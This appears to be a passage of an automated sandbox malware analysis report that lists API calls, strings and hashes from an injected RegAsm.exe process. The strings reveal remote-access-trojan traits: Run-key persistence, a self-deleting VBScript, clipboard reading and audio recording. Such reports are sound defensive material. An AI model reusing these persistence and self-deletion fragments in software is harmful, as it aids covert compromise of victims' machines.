                                                                                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                          • String ID: p'E$JD
                                                                                                                                                                                          • API String ID: 1084509184-908320845
                                                                                                                                                                                          • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                                                                                                                          • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0044338F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                          • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                                                                                                          • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 0040B74C
                                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 0040B758
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0040B760
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Clipboard$CloseDataOpen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2058664381-0
                                                                                                                                                                                          • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                                                                                                                          • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                                                                                                                                          • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                                                                                                                          • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                                                                                                                                                                          • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,0041605F,00000000), ref: 0041BBE7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CloseHandleOpenResume
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3614150671-0
                                                                                                                                                                                          • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                                                                                                                                          • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                                                                                                                                                                                          • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                                                                                                                                                                          • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,0041603A,00000000), ref: 0041BBBB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CloseHandleOpenSuspend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1999457699-0
                                                                                                                                                                                          • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                                                                                                                          • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                                                                                                                                                                                          • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                                                                                                                          • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                          • String ID: MZ@
                                                                                                                                                                                          • API String ID: 2325560087-2978689999
                                                                                                                                                                                          • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                                                                                                                          • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                                                                                                                          • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                                                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                                                                                                                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                                                                                                                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                                                                                                                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                                                                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040D80B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                                          • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                                                                                          • API String ID: 1861856835-1447701601
                                                                                                                                                                                          • Opcode ID: cc5506e99d52bec533bc9c9c9ab373ef3be6af367edd70b5d8f64a8857ecc260
                                                                                                                                                                                          • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                                                                                                                                                          • Opcode Fuzzy Hash: cc5506e99d52bec533bc9c9c9ab373ef3be6af367edd70b5d8f64a8857ecc260
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                                                                                                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                                                                                                                                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                                                                                                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                                                                                                                          • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                                                                                                                                                          • API String ID: 2649220323-436679193
                                                                                                                                                                                          • Opcode ID: 5423d87cc751ed5cfd1d4c8b3581599aeeb643011f75056a7ca0d89747c9c64e
                                                                                                                                                                                          • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5423d87cc751ed5cfd1d4c8b3581599aeeb643011f75056a7ca0d89747c9c64e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                                                                                                                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
                                                                                                                                                                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                                                                                                                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                                                                                                                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                                                                                                                                          • SetEvent.KERNEL32 ref: 0041B2AA
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                                                                                                                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                                                                                                                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                                                                                                                                          • API String ID: 738084811-2094122233
                                                                                                                                                                                          • Opcode ID: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                                                                                                                                                          • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                                                                                                                                                          • Opcode Fuzzy Hash: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                                                                                                                                                          • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Write$Create
                                                                                                                                                                                          • String ID: RIFF$WAVE$data$fmt
                                                                                                                                                                                          • API String ID: 1602526932-4212202414
                                                                                                                                                                                          • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                                                                                                                          • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                                                                                                                                                          • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                                                                                                                          • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                                                                          • API String ID: 1646373207-255920310
                                                                                                                                                                                          • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                                                                                                                          • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                                                                                                                                                          • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0040CE42
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                                                                                                                                          • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0040CF21
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                                                                                                                                          • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000), ref: 0040CFBF
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0040D001
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040D09D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                                                                                          • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                                                                                                                                                          • API String ID: 1579085052-2309681474
                                                                                                                                                                                          • Opcode ID: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                                                                                                                                                          • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                                                                                                                                                          • Opcode Fuzzy Hash: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                                                                                                                                                          • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                                                                                                                                                          • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                                                                                                                                                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                                                                                                                                                          • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                                                                                                                                                          • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0041C1CC
                                                                                                                                                                                          • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041C204
